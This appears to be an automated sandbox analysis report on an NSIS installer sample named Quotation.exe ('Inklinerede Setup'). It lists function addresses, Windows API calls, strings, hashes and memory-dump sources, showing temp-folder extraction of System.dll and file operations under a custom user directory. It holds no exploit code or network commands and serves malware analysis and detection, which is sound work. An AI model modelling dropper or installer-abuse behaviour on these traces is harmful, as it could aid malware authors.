Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
ShowWindow.USER32(?), ref: 00404FD9
GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
ShowWindow.USER32(?,00000004), ref: 00405006
GetDlgItem.USER32(?,00000001), ref: 0040512D
GetDlgItem.USER32(?,00000002), ref: 00405137
SetClassLongW.USER32(?,000000F2,?), ref: 00405151
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
GetDlgItem.USER32(?,00000003), ref: 0040524E
ShowWindow.USER32(00000000,?), ref: 00405277
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
EnableWindow.USER32(?), ref: 004052B7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
EnableMenuItem.USER32(00000000), ref: 004052D5
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
lstrlenW.KERNEL32(Inklinerede Setup: Installing,?,Inklinerede Setup: Installing,00000000), ref: 0040532E

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E

SetWindowTextW.USER32(?,Inklinerede Setup: Installing), ref: 00405346

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 0040538E
CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2

Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512

GetDlgItem.USER32(?,000003FA), ref: 004053EB
GetWindowRect.USER32(00000000), ref: 004053F2
ScreenToClient.USER32(?,?), ref: 004053FE
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
ShowWindow.USER32(00000008,?,00000000), ref: 00405436

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

ShowWindow.USER32(?,0000000A), ref: 0040547C

Strings

Inklinerede Setup: Installing, xrefs: 0040531C, 00405329, 00405340

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Inklinerede Setup: Installing
API String ID: 162979904-1772282993
Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

Function 00405A1C Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE

lstrcatW.KERNEL32(1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000,00000002,00000000), ref: 00405B23
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,007B3800,1033,Inklinerede Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inklinerede Setup: Installing,00000000), ref: 00405B38
GetFileAttributesW.KERNEL32(Call), ref: 00405B43
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00405B8C

Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A

RegisterClassW.USER32(007A74E0), ref: 00405BD1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
ShowWindow.USER32(00000005,00000000), ref: 00405C4F
GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
RegisterClassW.USER32(007A74E0), ref: 00405C94
DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF

Strings

Inklinerede Setup: Installing, xrefs: 00405A4F, 00405A5A, 00405A7A, 00405A84, 00405A99
1033, xrefs: 00405A3F, 00405A63, 00405A9A
RichEd20, xrefs: 00405C55
Call, xrefs: 00405AE4, 00405AED, 00405AFE, 00405B52, 00405B58
.DEFAULT\Control Panel\International, xrefs: 00405A8A
RichEd32, xrefs: 00405C63
_Nb, xrefs: 00405BB0, 00405C17
tz, xrefs: 00405B94
.exe, xrefs: 00405B32
RichEdit, xrefs: 00405C81
Control Panel\Desktop\ResourceLocale, xrefs: 00405A5C
RichEdit20W, xrefs: 00405C74, 00405C8A

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$Call$Control Panel\Desktop\ResourceLocale$Inklinerede Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
API String ID: 1975747703-3108346752
Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82

Strings

C:\Users\user\AppData\Local\Temp\nsuF14C.tmp, xrefs: 00401998, 004019BB
C:\Users\user\overlays\besvangredes\Konditorierne, xrefs: 00401798, 0040190E
Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp$C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll$C:\Users\user\overlays\besvangredes\Konditorierne$Call
API String ID: 3895412863-1325301756
Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E

Strings

Error launching installer, xrefs: 0040341A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
C:\Users\user\Desktop\Quotation.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
soft, xrefs: 004034C2
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
Inst, xrefs: 004034B8
C:\Users\user\Desktop, xrefs: 00403425, 0040342A, 00403430
Null, xrefs: 004034CC

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2520809451
Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 00405FD5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 004060A8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406048
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8D
Call, xrefs: 00405EBA, 00405F88, 00405FAC, 00405FC1, 00405FD4, 00405FE7, 00406014, 0040604D, 00406054, 00406070, 00406083, 00406091, 004060A1, 004060A7, 004060CE, 004060EA
Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll, xrefs: 00405EF3

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-632833649
Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D77
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll), ref: 00405D8F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll, xrefs: 00405D35, 00405D43, 00405D49, 00405D71, 00405D76, 00405D7E, 00405D88

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll
API String ID: 1759915248-3823302012
Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403248
MulDiv.KERNEL32(?,00000064,?), ref: 00403278
wsprintfW.USER32 ref: 00403289

Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Strings

... %d%%, xrefs: 00403283
<Py, xrefs: 0040321B

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$<Py
API String ID: 999035486-2352372732
Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

%s%S.dll, xrefs: 004061C9
UXTHEME, xrefs: 0040618B
\, xrefs: 004061A4

Memory Dump Source

